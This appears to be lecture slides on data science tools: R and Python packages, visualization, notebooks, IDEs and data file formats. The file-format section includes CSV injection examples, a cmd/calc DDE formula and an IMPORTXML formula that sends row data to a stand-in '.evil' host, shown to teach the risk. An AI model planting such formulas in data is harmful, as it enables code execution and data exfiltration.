Advanced Analytics in Business [D0S07a] / Big Data Platforms & Technologies [D0S06a]
Data Science Tools
Overview
In-memory analytics
Python and R
More on visualization
The road to big data
Notebooks and development environments
A word on file formats
A word on packaging and versioning systems
Model deployment
2
In-memory Analytics
3
The landscape is incredibly complex
4
Amazon, Cloudera, Datameer, DataStax, Dell, Oracle, IBM, MapR, Pentaho, Databricks, Microsoft, Hortonworks, EMC²
“My data lake versus yours”
There’s always “roll your own”
Open source, or walled garden?
Support, features, speed of upgrades?
The situation has stabilized a bit (the champions have settled), but does it matter?
Heard about Hadoop? Spark? H2O?
Many vendors with their “big data and analytics” stack
Infrastructure
“Big Data” “Integration” “Architecture” NoSQL and NewSQL “Streaming”
Two sides emerge
6
Analytics
“Data Science” “Machine Learning” “AI”
But also still: BI and Visualization
Two sides emerge
7
There’s a difference
8
In-memory analytics
The assumption of many tools: your data set fits in memory
SAS, SPSS, MATLAB, R, Python, Julia
Is this really a problem?
Servers with 512 GB of RAM have become relatively cheap, cheaper than an HDFS cluster (especially in today’s cloud environment)
Implementation makes a difference (representation of the data set in memory)
If your task is unsupervised or supervised modeling, you can apply sampling
Some algorithms can work in online / batch mode
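The sampling idea can be made concrete without any libraries: reservoir sampling draws a fixed-size uniform sample in a single pass over a stream, so the full data set never has to fit in memory. A minimal sketch (the function name and toy stream are illustrative, not from any particular package):

```python
import random

def reservoir_sample(stream, k, seed=42):
    """Uniformly sample k items from an iterable of unknown length: one pass, O(k) memory."""
    rng = random.Random(seed)
    sample = []
    for i, item in enumerate(stream):
        if i < k:
            sample.append(item)          # fill the reservoir first
        else:
            j = rng.randint(0, i)        # replace a slot with decreasing probability k/(i+1)
            if j < k:
                sample[j] = item
    return sample

# The "stream" could just as well be lines read lazily from a huge file
sample = reservoir_sample(range(1_000_000), 100)
print(len(sample))  # → 100
```

Fit the model on the sample; for many supervised tasks the loss in accuracy is small compared to the cost of a cluster.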
9
Python and R
10
The big two
The “big two” in modern data science: Python and R
Both have their advantages Others are interesting too (e.g. Julia), but still less adopted
Not (really) due to the language itself
Thanks to their huge ecosystem: many packages for data science available “Python is the second best language for everything”
Vendors such as SAS and SPSS remain as well
But bleeding-edge algorithms or techniques are found in open source first
11
Analytics with R
Native concept of a “data frame”: a table in which each column contains measurements on one variable, and each row contains one case. Unlike a matrix, the columns of a data frame can hold data of various types: one column might be numeric, another a factor, and a third a character variable. All columns have to be the same length (contain the same number of data items, although some of those may be missing values).
Fun read: Is a Dataframe Just a Table?, Yifan Wu, 2019
Analytics with R
R is great thanks to its ecosystem
Hadley Wickham: Chief Scientist at RStudio, and Adjunct Professor of Statistics at the University of Auckland, Stanford University, and Rice University
The data science “tidyverse”:
ggplot2 for visualising data
dplyr for manipulating data
tidyr for tidying data
stringr for working with strings
lubridate for working with dates/times
https://www.tidyverse.org/
Data import:
readr for reading .csv and fwf files
readxl for reading .xls and .xlsx files
haven for SAS, SPSS, and Stata files (also: the “foreign” package)
httr for talking to web APIs
rvest for scraping websites
xml2 for importing XML files
Concept of “tidy” data and operations
Modern R
Learning R today? Make sure to use “modern R” principles
tidyverse should be the first package you install, especially thanks to dplyr, tidyr, stringr, and lubridate
dplyr implements a verb-based data manipulation language
It works on normal data frames but can also work with database connections (already a simple way to tackle mid-to-big sized data)
Verbs can be piped together, similar to a Unix pipe operator
flights %>%
  select(year, month, day) %>%
  arrange(desc(year)) %>%
  head
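For readers coming from Python, the same verb-piping idea can be mimicked in a few lines of plain Python. This is an illustrative sketch only (the `pipe`, `select`, `arrange_desc` and `head` names and the toy `flights` rows are mine, not a real dplyr port):

```python
from functools import reduce

def pipe(data, *verbs):
    """Thread `data` through each verb in turn, like %>% chains in dplyr."""
    return reduce(lambda d, f: f(d), verbs, data)

# Each "verb" takes a list of dict rows and returns a transformed list
def select(*cols):
    return lambda rows: [{c: r[c] for c in cols} for r in rows]

def arrange_desc(col):
    return lambda rows: sorted(rows, key=lambda r: r[col], reverse=True)

def head(n=6):
    return lambda rows: rows[:n]

flights = [
    {"year": 2013, "month": 1, "day": 1, "dep_delay": 2},
    {"year": 2014, "month": 6, "day": 3, "dep_delay": 9},
]
result = pipe(flights, select("year", "month", "day"), arrange_desc("year"), head())
print(result[0]["year"])  # → 2014
```

The design point is the same as dplyr’s: each verb is a pure function from table to table, so chains compose without intermediate variables.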
14
Modern R
delay <- flights %>%
  group_by(tailnum) %>%
  summarise(count = n(),
            dist = mean(distance, na.rm = TRUE),
            delay = mean(arr_delay, na.rm = TRUE))

delay %>%
  filter(count > 20, dist < 2000) %>%
  ggplot(aes(dist, delay)) +
    geom_point(aes(size = count), alpha = 1/2) +
    geom_smooth() +
    scale_size_area()
Also see: https://www.rstudio.com/resources/cheatsheets/
Modeling with R
Virtually any unsupervised or supervised algorithm is implemented in R as a package The caret package (short for Classification And REgression Training) is a set of functions that attempt to streamline the process for creating predictive models. The package contains tools for:
Data splitting Pre-processing Feature selection Model tuning using resampling Variable importance estimation
Caret depends on other packages to do the actual modeling, and wraps these to offer a unified interface
You can just use the original package as well if you know what you want Still widely used
16
Modeling with R
require(caret)
require(ggplot2)
require(randomForest)

training <- read.csv("train.csv", na.strings = c("NA", ""))
test <- read.csv("test.csv", na.strings = c("NA", ""))

# Invoke caret with random forest and 5-fold cross validation
rf_model <- train(TARGET ~ ., data = training, method = "rf",
                  trControl = trainControl(method = "cv", number = 5),
                  ntree = 500)  # Other parameters can be passed here

print(rf_model)
## Random Forest
##
## 5889 samples
##   53 predictors
##    5 classes: 'A', 'B', 'C', 'D', 'E'
##
## No pre-processing
## Resampling: Cross-Validated (5 fold)
##
## Summary of sample sizes: 4711, 4712, 4710, 4711, 4712
##
## Resampling results across tuning parameters:
##
##   mtry  Accuracy  Kappa  Accuracy SD  Kappa SD
##    2    1         1      0.006        0.008
##   27    1         1      0.005        0.006
##   53    1         1      0.006        0.007
##
## Accuracy was used to select the optimal model using the largest value.
## The final value used for the model was mtry = 27.
17
Modeling with R
print(rf_model$finalModel)
##
## Call:
##  randomForest(x = x, y = y, mtry = param$mtry, proximity = TRUE,
##               allowParallel = TRUE)
##                Type of random forest: classification
##                      Number of trees: 500
## No. of variables tried at each split: 27
##
##         OOB estimate of error rate: 0.88%
## Confusion matrix:
##      A    B    C   D    E class.error
## A 1674    0    0   0    0     0.00000
## B   11 1119    9   1    0     0.01842
## C    0   11 1015   1    0     0.01168
## D    0    2   10 952    1     0.01347
## E    0    1    0   5 1077     0.00554
18
Modeling with R
The mlr package is an alternative to caret
R does not define a standardized interface for all its machine learning algorithms
The mlr package provides infrastructure so that you can focus on your experiments
The framework provides supervised methods like classification, regression and survival analysis, along with their corresponding evaluation and optimization methods, as well as unsupervised methods like clustering
The package is connected to the OpenML R package and its online platform, which supports collaborative machine learning and makes it easy to share datasets, machine learning tasks, algorithms and experiments in support of reproducible research
mlr3: https://mlr3.mlr-org.com/
Newer, though gaining uptake
Modeling with R
library(mlr3)
set.seed(1)

task_iris = TaskClassif$new(id = "iris", backend = iris, target = "Species")
learner = lrn("classif.rpart", cp = 0.01)

train_set = sample(task_iris$nrow, 0.8 * task_iris$nrow)
test_set = setdiff(seq_len(task_iris$nrow), train_set)

# train the model
learner$train(task_iris, row_ids = train_set)

# predict data
prediction = learner$predict(task_iris, row_ids = test_set)

# calculate performance
prediction$confusion
##             truth
## response     setosa versicolor virginica
##   setosa         11          0         0
##   versicolor      0         12         1
##   virginica       0          0         6

measure = msr("classif.acc")
prediction$score(measure)
## classif.acc
##   0.9666667
20
Modeling with R
The modelr package provides functions that help you create elegant pipelines when modelling
By Hadley Wickham Mainly for simple regression models
More information: http://r4ds.had.co.nz/
Modern R approach Starts simple – linear and visual models Good introduction
21
ggplot2 reigns supreme
By Hadley Wickham
Uses a “grammar of graphics” approach
A grammar of graphics is a tool that enables us to concisely describe the components of a graphic An abstraction which makes thinking, reasoning and communicating graphics easier Such a grammar allows us to move beyond named graphics (e.g., the “scatterplot”) and gain insight into the deep structure that underlies statistical graphics Original idea: Wilkinson (2006)
ggvis : based on ggplot2 and built on top of vega (a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs)
Also declaratively describes data graphics Different render targets Interactivity: interact in browser, phone, …
Visualizations with R
22
Visualizations with R
shiny : a web application framework for R Construct interactive dashboards
23
Other packages worth noting
Apart from those mentioned elsewhere…
janitor: tools for cleaning data
foreign: read in SAS data
stringr: work with text
lubridate: work with times and dates
ROCR: make ROC and other curves (or verification, or pROC, or mltools)
mice: handle missing data (or naniar)
ROSE: up/down sampling with SMOTE
forecast: time series analysis (or prophet)
leaflet: make maps
igraph: social network analysis
esquisse: drag and drop ggplot2 plot builder (Tableau-style, https://dreamrs.github.io/esquisse/)
assertr: assertions on data
24
Analytics with Python
Python itself is not a statistical / scientific language
SciPy is a Python-based ecosystem of open-source software for mathematics, science, and engineering NumPy is the fundamental package for scientific computing with Python
A powerful N-dimensional array object, sophisticated (broadcasting) functions, tools for integrating C/C++ and Fortran code, useful linear algebra, … “Let’s make Python’s arrays fast”
pandas is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language
Python’s “data frame”, uses NumPy
matplotlib: comprehensive 2D plotting
SciPy library: fundamental library for scientific computing
25
Analytics with Python
Learning solid NumPy indexing and broadcasting is a superpower

Image (3d array):  256 x 256 x 3
Scale (1d array):  (1) x (1) x 3
Result (3d array): 256 x 256 x 3

A (4d array):      8 x 1 x 6 x 1
B (3d array):      (1) x 7 x 1 x 5
Result (4d array): 8 x 7 x 6 x 5

“When operating on two arrays, NumPy compares their shapes element-wise. It starts with the trailing dimensions, and works its way forward. Two dimensions are compatible when they are equal, or one of them is 1. Arrays do not need to have the same number of dimensions, they’re lined up in a trailing fashion. When either of the dimensions compared is one, the other is used. In other words, dimensions with size 1 are stretched or ‘copied’ to match the other.”
– https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html
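The rule quoted above can be written down directly: walk both shapes from the trailing dimension forward, and two sizes are compatible when they are equal or one of them is 1. A pure-Python sketch of NumPy's shape rule (this reimplements only the shape arithmetic, not NumPy itself):

```python
def broadcast_shape(a, b):
    """Return the broadcast result shape of two shapes, per NumPy's trailing-dimension rule."""
    # Left-pad the shorter shape with 1s so both line up in a trailing fashion
    a = (1,) * (len(b) - len(a)) + tuple(a)
    b = (1,) * (len(a) - len(b)) + tuple(b)
    result = []
    for x, y in zip(reversed(a), reversed(b)):
        if x == y or x == 1 or y == 1:
            result.append(max(x, y))     # the size-1 dimension is "stretched"
        else:
            raise ValueError(f"shapes {a} and {b} are not broadcastable")
    return tuple(reversed(result))

print(broadcast_shape((8, 1, 6, 1), (7, 1, 5)))   # → (8, 7, 6, 5)
print(broadcast_shape((256, 256, 3), (3,)))       # → (256, 256, 3)
```

These match the Image/Scale and A/B examples on this slide.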
26
Analytics with Python
import pandas as pd
import numpy as np

# (Assumed setup, as in the introductory example of the pandas documentation)
dates = pd.date_range('2013-01-01', periods=6)
df = pd.DataFrame(np.random.randn(6, 4), index=dates, columns=list('ABCD'))

df.sort_values(by='B')
                   A         B         C         D
2013-01-03 -0.861849 -2.104569 -0.494929  1.071804
2013-01-04  0.721555 -0.706771 -1.039575  0.271860
2013-01-01  0.469112 -0.282863 -1.509059 -1.135632
2013-01-02  1.212112 -0.173215  0.119209 -1.044236
2013-01-06 -0.673690  0.113648 -1.478427  0.524988
2013-01-05 -0.424972  0.567020  0.276232 -1.087401
27
Analytics with Python
NumPy itself is clean and very well documented… Pandas’ API is a bit of a mess
“Minimally Sufficient Pandas”: https://medium.com/dunder-data/minimally-sufficient-pandas-a8e67f2a2428
E.g. on the different ways to index:
.loc is primarily label based (dataframe.loc['a']), but may also be used with a boolean array; .loc will raise KeyError when the items are not found
.iloc is primarily integer position based (from 0 to length-1 of the axis)
.ix supports mixed integer and label based access (now deprecated)
Similarly to .loc, .at provides label based scalar lookups, while .iat provides integer based lookups analogously to .iloc
Oh, and you can still do dataframe.a or dataframe['a']
If df is a sufficiently long DataFrame, then df[1:2] gives the second row, however df[1] gives an error and df[[1]] gives the second column

There are packages like dplython and pandas-ply, though not widely used
Pandas does have strong time-series operators, however
Modeling with Python
Modeling offers a better picture
scikit-learn is uncontested in the Python ecosystem
Simple and efficient tools for data mining and data analysis Accessible to everybody, and reusable in various contexts Built on NumPy, SciPy, and matplotlib Open source, commercially usable - BSD license Lots of algorithms implemented Relatively easy to implement your own algorithms
statsmodels
Python library that provides classes and functions for the estimation of many different statistical models, as well as for conducting statistical tests, and statistical data exploration
29
Modeling with Python
from sklearn.datasets import load_iris
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import numpy as np

iris = load_iris()
df = pd.DataFrame(iris.data, columns=iris.feature_names)
df['is_train'] = np.random.uniform(0, 1, len(df)) <= .75
# pd.Factor is long gone; pd.Categorical.from_codes is the current equivalent
df['species'] = pd.Categorical.from_codes(iris.target, iris.target_names)

train, test = df[df['is_train'] == True], df[df['is_train'] == False]
features = df.columns[:4]

clf = RandomForestClassifier(n_jobs=2)
y, _ = pd.factorize(train['species'])
clf.fit(train[features], y)

preds = iris.target_names[clf.predict(test[features])]
pd.crosstab(test['species'], preds, rownames=['actual'], colnames=['preds'])
30
Modeling with Python
For some things you’ll have to look elsewhere
pystruct handles general structured learning seqlearn handles sequence based learning surprise for recommender engines statsmodels or prophet for time series Deep learning and reinforcement learning both require a rich vocabulary to define an architecture, with deep learning additionally requiring GPUs for efficient computing. However, neither of these fit within the design constraints of scikit-learn
Basic CPU-based artificial neural networks are present, however
Relatively good support to work with textual data though – i.e. many featurization options
scikit-learn tries to provide a unified API for the basic tasks in machine learning, with pipelines and meta-algorithms like grid search to tie everything together
31
Visualizations with Python
matplotlib: the foundation
seaborn: “if matplotlib ‘tries to make easy things easy and hard things possible,’ seaborn tries to make a well-defined set of hard things easy too”
ggplot: Python implementation of ggplot2; not a “feature-for-feature port of ggplot2,” but there’s strong feature overlap
Altair: newer library with a “pleasant API”
bokeh: similar
yellowbrick
Datashader: for massive amounts of data points

Older but fun comparison at: https://dansaber.wordpress.com/2016/10/02/a-dramatic-tour-through-pythons-data-visualization-landscape-including-ggplot-and-altair/
Other packages worth noting
Apart from those mentioned elsewhere…
imbalanced-learn: up/down sampling with SMOTE and friends
plotnine: another ggplot-style Python plotting tool
tqdm: human friendly progress bars
missingno: handle missing data
dateparser: handling dates in various formats
pyflux: time series analysis (or prophet, or tsfresh)
great_expectations: assertions on data
folium: mapping library
scikit.ml: multilabel techniques
pomegranate: probabilistic models
semisup-learn: semi-supervised models

And there are interop packages to work between R and Python as well (e.g. reticulate)
33
More on Visualization
34
Packaged software and BI
Apart from the libraries mentioned above, there’s also packaged “business intelligence” software

E.g. Tableau, Spotfire, PowerBI, Cognos, Qlikview, SAS Visual Analytics, …
Just “use” the tool, no hassle of coding and debugging
Ease-of-use
Limited in functionality
Custom design more difficult
Has nothing to do with modeling
35
Packaged software and BI
Niche visualization can require niche tools, though
Web analytics (Google, Adobe, SAS)
Process mining (Disco and friends)
Graph visualizations: Gephi, NodeXL, sigma.js, Cytoscape
Mapping (Leaflet, Folium, kepler.gl, others)
36
Further libraries to be aware of
d3.js: JavaScript library that made the concept of “data-driven documents” famous
D3 allows you to bind arbitrary data to a Document Object Model (DOM), and then apply data-driven transformations to the document For example, you can use D3 to generate an HTML table from an array of numbers. Or, use the same data to create an interactive SVG bar chart with smooth transitions and interaction Direct coupling between data and visualization: changing the data changes the visualisation See: https://github.com/mbostock/d3/wiki/Gallery, http://bl.ocks.org/, http://bl.ocks.org/mbostock and https://bost.ocks.org/mike/
Graphviz: diagram and graph visualizations (serves as the “engine” in many other tools) Plotly: widely used charting library, with Plotly Dash (https://plot.ly/products/dash/) as a great dashboarding tool for Python (great shiny alternative)
37
The Road to Big Data
38
On-GPU analytics
GPU: graphical processing unit
Efficient for massively parallelizable operations (e.g. linear algebra, vector operations)
Ecosystem mainly based on Python
TensorFlow and PyTorch as the current leaders, with dozens of other libraries: Chainer, mxnet, Sonnet, …
Hardware support mainly based on NVIDIA GPUs with the CUDA SDK
Training data can be very large (a million images, for instance), but not necessarily stored or handled in a distributed fashion
“Epoch”: one iteration of training; for small data sets, exposing the learning algorithm to the entire set of training data (the “batch”)
“Minibatch” means that the gradient is calculated across a sample of the data before updating weights
Can be done in-memory
Computation can be distributed, however: this usually means distributing over multiple GPUs (e.g. with Apache mxnet), which is a separate approach from Hadoop and friends, and often hits bottlenecks when used in a networked fashion, so “distributed” in practice often means multiple GPUs in one machine
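The epoch/minibatch vocabulary maps onto a simple loop. Here is a dependency-free sketch that fits y = 2x by minibatch gradient descent (the function name, learning rate and toy data are mine, chosen purely for illustration):

```python
import random

def fit_slope(xs, ys, epochs=50, batch_size=4, lr=0.05, seed=0):
    """Fit y = w*x with minibatch SGD: one epoch = one full pass over the shuffled data."""
    rng = random.Random(seed)
    data = list(zip(xs, ys))
    w = 0.0
    for _ in range(epochs):                      # an "epoch"
        rng.shuffle(data)
        for i in range(0, len(data), batch_size):
            batch = data[i:i + batch_size]       # a "minibatch"
            # gradient of mean squared error, computed over the minibatch only
            grad = sum(2 * (w * x - y) * x for x, y in batch) / len(batch)
            w -= lr * grad                       # one weight update per minibatch
    return w

xs = [x / 10 for x in range(1, 21)]
ys = [2.0 * x for x in xs]
w = fit_slope(xs, ys)
print(round(w, 2))  # → 2.0
```

Frameworks like PyTorch do exactly this loop, only with tensors on a GPU and automatic differentiation in place of the hand-written gradient.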
39
On-disk analytics
Even if your data set exceeds the boundaries of memory, there might be an easier way than big-data oriented setups: the “intermediate” step before going full “big data”
Learn how to use your package correctly (e.g. apply methods instead of slow for loops!)
Use a database and SQL
Use a better memory representation (e.g. data.table in R)
Memory-mapped files (i.e. “disk-scratching”): ff or bigmemory in R (but not that fun)
disk.frame: a great new package – https://github.com/xiaodaigh/disk.frame
Dask in Python, similar API as pandas
Pandas on Ray (https://ray.readthedocs.io/en/latest/pandas_on_ray.html) is also popular, powerful when combined with modin (https://github.com/modin-project/modin) (“Modin is a DataFrame designed for datasets from 1KB to 1TB+”)
vaex (https://github.com/vaexio/vaex): works with huge tabular data, processes more than a billion rows/second
Dato (Turi) used to have a great implementation, now open source as SFrame (https://github.com/turi-code/SFrame) and in https://github.com/apple/turicreate – also worth checking out
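Before reaching for any of these packages, remember that a streaming aggregation is often enough: read the file once and keep only running totals. A stdlib-only sketch of the kind of out-of-core group-by that Dask and friends perform (the function name and toy CSV are mine):

```python
import csv
import io
from collections import defaultdict

def mean_value_per_user(lines):
    """One pass over a CSV stream with constant memory: running (sum, count) per key."""
    sums, counts = defaultdict(float), defaultdict(int)
    for row in csv.DictReader(lines):    # never materializes the whole file
        sums[row["user_id"]] += float(row["value"])
        counts[row["user_id"]] += 1
    return {u: sums[u] / counts[u] for u in sums}

# In practice `lines` would be open("huge.csv"); a small in-memory stand-in here:
data = io.StringIO("user_id,value\n1,10\n2,30\n1,20\n")
result = mean_value_per_user(data)
print(result)  # → {'1': 15.0, '2': 30.0}
```

Memory use stays proportional to the number of distinct keys, not to the file size.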
40
On-disk analytics
# pandas (single file, in memory)
import pandas as pd
df = pd.read_csv('2015-01-01.csv')
df.groupby(df.user_id).value.mean()

# Dask (many files, lazy, out of core)
import dask.dataframe as dd
df = dd.read_csv('2015-*-*.csv')
df.groupby(df.user_id).value.mean().compute()

# GraphLab / SFrame
import graphlab
import graphlab.aggregate as agg
sf = graphlab.SFrame.read_csv('2018-01-01.csv')
sf.groupby(key_columns='user_id', operations={'avg': agg.MEAN('value')})
Nevertheless, most organizations that jumped on the Spark and co. bandwagon would have been better off taking a good look at the above
It could have been solved with a bunch of servers and a (distributed) on-disk library Funny how most of these libraries have adopted the directed acyclic graph (DAG) computing approach initially “rediscovered” by Spark as a way to forego MapReduce, something we’ll talk about later
“Pandas is crashing because I’m trying to work with a 50GB data set” is not really an excuse Careful with this, though. You can end up with Pandas, Dask and Spark code in one spaghetti bowl. Guess how I found that out…
41
Notebooks and Development Environments
42
Notebooks
Scientific programming in data science is very much concerned with exploration, experimentation, making demos, collaborating, and sharing results
It is this need for experiments, explorations, and collaborations that is addressed by notebooks for scientific computing Notebooks are collaborative web-based environments for data exploration and visualization Similar to a “lab notebook”
The idea of computational notebooks has been around for a long time, starting with the early days of MATLAB and Mathematica in the mid-to-late 80s
Later: SageMath and IPython Today: Jupyter
43
Notebooks
44
Notebooks
The Sage Notebook was released on 24 February 2005 by William Stein
Professor of mathematics at the University of Washington
Free and open source software (GNU GPL), with the initial goal of creating an “open source alternative to Magma, Maple, Mathematica, and MATLAB”
Sage is based on Python and focuses on mathematical worksheets
Today: not widely used, outdated
The IPython console was started by Fernando Pérez circa 2001

From a first attempt to replicate a Mathematica notebook in 259 lines of code
With the Sage Notebook as a reference, Pérez collaborated frequently with the Sage team
In 2015, the IPython Notebook project became the Jupyter project
The ability to go beyond Python and run several languages (i.e. several “kernels”) in a notebook is at the center of the Jupyter rebirth However, it is not possible to have multiple cells with multiple languages within the same notebook Impressive success and steady growth since 2011
45
Notebooks
46
Notebooks
Other alternatives:
Apache Zeppelin: similar in concept to Jupyter
Apache Zeppelin is built on the JVM while Jupyter is built on Python
Zeppelin offers the possibility to mix languages across cells
Zeppelin is mainly oriented towards Spark
It was originally positioned as the way forward by many Spark-based vendor stacks, though today Jupyter is the most popular environment, so most stacks now include (or have moved to) Jupyter
Beaker: designed from the start to be a fully polyglot notebook.
Supports Python, Python3, R, Julia, JavaScript, SQL, Java, Clojure, HTML5, Node.js, C++, LaTeX, Ruby, Scala, Groovy, Kdb Nice idea of mixing languages in the same notebook, but has not really gone anywhere
nteract: for those of you that like to have Jupyter installed as a desktop app
Includes easier ways for styling
47
Notebooks
Jupyter comes with a lot of benefits
Quick iteration, immediate output shown in the notebook Easy to construct “dynamic” reports, by applying your style sheets You can even make them interactive (i.e. through the use of widgets, https://ipywidgets.readthedocs.io/en/latest/examples/Widget%20Basics.html) Many extensions to adjust your workflow “Jupyter Hub” to host a multi user Jupyter environment
E.g. Netflix uses papermill to directly execute and schedule Notebooks
papermill is a tool for parameterizing, executing, and analyzing Jupyter Notebooks https://medium.com/netflix-techblog/scheduling-notebooks-348e6c14cfd6 https://github.com/nteract/papermill
48
Notebooks
But come with a set of issues as well…
Version control can be problematic
Jupyter stores notebooks as one big JSON file, including inputs and outputs Every time you make a change, need to commit the whole file
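Because a notebook is just JSON, the version-control pain can be eased by stripping outputs before committing, which is essentially what tools like nbstripout do. A minimal stdlib sketch (the function name and the tiny notebook document are mine):

```python
import json

def strip_outputs(notebook_json: str) -> str:
    """Remove outputs and execution counts from a Jupyter notebook's JSON."""
    nb = json.loads(notebook_json)
    for cell in nb.get("cells", []):
        if cell.get("cell_type") == "code":
            cell["outputs"] = []            # drop rendered results
            cell["execution_count"] = None  # drop the In[7]-style counters
    return json.dumps(nb, indent=1)

# A miniature one-cell notebook to demonstrate on:
raw = json.dumps({
    "nbformat": 4,
    "cells": [{"cell_type": "code", "source": ["1 + 1"],
               "execution_count": 7,
               "outputs": [{"data": {"text/plain": ["2"]}}]}],
})
cleaned = json.loads(strip_outputs(raw))
print(cleaned["cells"][0]["outputs"])  # → []
```

Run as a git pre-commit hook, this keeps diffs limited to the code you actually changed.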
Code can only be run block-by-block (cell by cell)
Can easily mess up flow of code (non-linear execution) You end up with a notebook, which has newer results above the older results
Code can end up looking fragmented
People start splitting the chunks and forget to put them back together, lose track of the order of the analysis and it all ends up in a big mess
Does not encourage writing modular code
You end up copying code fragments from older, other people’s notebooks
“Executing” a notebook can be difficult
Reproducibility? Export to Python, R?
49
Notebooks
https://docs.google.com/presentation/d/1n2RlMdmv1p25Xy5thJUhkKGvjtV-dkAIsUXP-AL4ffI/edit and https://yihui.name/en/2018/09/notebook-war/:

1. Hidden state and out-of-order execution
2. Notebooks are difficult for beginners
3. Notebooks encourage bad habits
4. Notebooks discourage modularity and testing
5. Jupyter’s autocomplete, linting, and way of looking up the help are awkward
6. Notebooks encourage bad processes
7. Notebooks hinder reproducible + extensible science
8. Notebooks make it hard to copy and paste into Slack/Github issues
9. Errors will always halt execution
10. Notebooks make it easy to teach poorly
11. Notebooks make it hard to teach well
50
Notebooks
https://colab.research.google.com
51
Notebooks
https://studio.azureml.net/
52
Notebooks
All cloud providers have realized that the best data science environment to offer is simply Python + Jupyter + the possibility to install packages The issues can be solved:
Version control can be problematic
Fixed in many hosted environments Collaboration possible as well Possible to “roll your own”, e.g. through the use of “git hooks”
Code can only be run block-by-block (cell by cell)
Enforce strict guidelines
Does not encourage writing modular code
E.g. see https://github.com/fastai/nbdev
“Executing” a notebook can be difficult
Solutions exist to overcome this as well, e.g. papermill
fast.ai is writing a whole book using Jupyter
The takeaway? Notebooks are here to stay
Great tool for exploration, experimentation, development phase of data science, even for showing results in “report” form
53
IDEs
Integrated development environment
Commonly offers much better debugging, code inspection, documentation capabilities RStudio for R
On desktop Or hosted on web server (commercial) Support for Git and others Authoring reports, slide shows Interactive visualizations
Spyder for Python
Copies the look and feel of RStudio
Similar: Rodeo
Or IDEs such as PyCharm Or Jupyter Lab
Builds on top of Jupyter Adds panel layout, file view
54
IDEs
https://www.rstudio.com/
55
IDEs
https://www.jetbrains.com/pycharm/
56
IDEs
https://github.com/jupyterlab/jupyterlab
57
IDEs
https://code.visualstudio.com/
58
Getting started
Python
Anaconda Distribution: https://www.continuum.io/downloads
Includes Jupyter, Python, and a data science package repository (also for R)
R
CRAN (base installation): https://cran.r-project.org/ RStudio: https://www.rstudio.com/ Or Jupyter
Hosted (“one click Jupyter”)
Google Colab: https://colab.research.google.com (free)
Azure ML Studio: https://studio.azureml.net/ (free)
Kaggle Kernels: https://www.kaggle.com/kernels (free)
http://paperspace.io/ and https://gradient.paperspace.com/
https://www.floydhub.com/
https://www.crestle.com/
https://www.onepanel.io/
https://www.easyaiforum.cn/ (易学智能)
SageMaker (AWS)
Google Cloud Platform, EC2, DigitalOcean… and install yourself
59
A Word on File Formats
60
In which format do we store our data?
You might be used to text-based formats (CSV and friends, or Excel), but there are various concerns at play here:
How fast is it to serialize (write) data?
How fast can it be read in?
How large is it?
Column or row based?
Easy to distribute?
Easy to modify the schema?
61
Text based formats
CSV, TSV, JSON, XML
Convenient to exchange with other applications or scripts
Human readable
Bulky and not efficient to query without reading the whole structure into memory first
Hard to infer a schema
Compression applies at the file level
Still one of the most common formats
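The “bulky” point is easy to quantify with the standard library alone: the same numeric records take more bytes as JSON than as CSV, and more as CSV than as fixed-width binary records. A toy measurement (exact byte counts depend on the values; the struct layout here is my own, not any standard format):

```python
import csv
import io
import json
import struct

rows = [(i, i * 0.5) for i in range(10_000)]

# Text: CSV
buf = io.StringIO()
csv.writer(buf).writerows(rows)
csv_bytes = len(buf.getvalue().encode())

# Text: JSON (repeats brackets and separators for every record)
json_bytes = len(json.dumps(rows).encode())

# Binary: fixed-width packed records (4-byte int + 8-byte float, no padding)
bin_bytes = len(b"".join(struct.pack("<id", i, x) for i, x in rows))

print(bin_bytes < csv_bytes < json_bytes)  # → True
```

Real binary formats (Avro, Parquet) add schemas and compression on top, widening the gap further.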
62
Text based formats
UserId,BillToDate,ProjectName,Description,DurationMinutes
1,2017-07-25,Test Project,Flipped the jibbet,60
2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240

UserId,BillToDate,ProjectName,Description,DurationMinutes
1,2017-07-25,Test Project,Flipped the jibbet,60
2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
2,2017-07-25,Important Client, "=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")", 240
http://georgemauer.net/2017/10/07/csv-injection.html
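The slide above shows CSV injection: a field beginning with =, +, - or @ is executed as a formula when the file is opened in a spreadsheet. A common mitigation (described e.g. by OWASP) is to neutralize such leading characters on export; a minimal sketch, with names of my own choosing:

```python
import csv
import io

DANGEROUS = ("=", "+", "-", "@", "\t", "\r")

def sanitize_field(value):
    """Prefix fields a spreadsheet would interpret as formulas with an apostrophe."""
    text = str(value)
    if text.startswith(DANGEROUS):
        # The leading apostrophe forces text interpretation in Excel et al.
        # (Real exporters usually whitelist numeric fields so "-5" stays a number.)
        return "'" + text
    return text

buf = io.StringIO()
csv.writer(buf).writerow(
    [sanitize_field(f) for f in
     [2, "Important Client", "=2+5+cmd|' /C calc'!A0", 240]])
print(buf.getvalue().strip())
```

The malicious payload survives as inert text instead of executing on the analyst's machine.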
Text based formats
64
Sequence files
A persistent data structure for binary key-value pairs
“Serialized Java objects”
Row-based
Commonly used to transfer data in MapReduce jobs (see later)
Compression applies at the row level
Less popular in recent years, not portable
65
Optimized Row Columnar (ORC)
Evolution of the older RCFile
Stores collections of rows, and within each collection the data is stored in columnar format (a combination of row- and column-based)
Lightweight indexing
Splittable
Less popular in recent years
66
Apache Avro
Widely used as a serialization format
Row-based, compact binary format
Schema is included in the file
Supports schema evolution: add, rename and delete columns
Compression at the record level
https://blog.cloudera.com/blog/2009/11/avro-a-new-format-for-data-interchange/
Apache Parquet
Column-oriented binary file format
Efficient when specific columns are queried
Common in data science
Parquet is built to support very efficient compression and encoding schemes
Parquet allows compression schemes to be specified at the per-column level
Good support for schema evolution: columns can be added at the end
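The row-versus-column distinction Parquet exploits can be illustrated in plain Python: in a columnar layout, scanning one column touches only that column's contiguous values. A toy model of the two layouts (not Parquet's actual encoding):

```python
# Row-based layout: one record after another (like Avro)
row_store = [
    {"user": "a", "clicks": 3, "spend": 1.0},
    {"user": "b", "clicks": 5, "spend": 2.5},
    {"user": "c", "clicks": 2, "spend": 0.5},
]

# Column-based layout: one list per column (like Parquet)
col_store = {
    "user":   ["a", "b", "c"],
    "clicks": [3, 5, 2],
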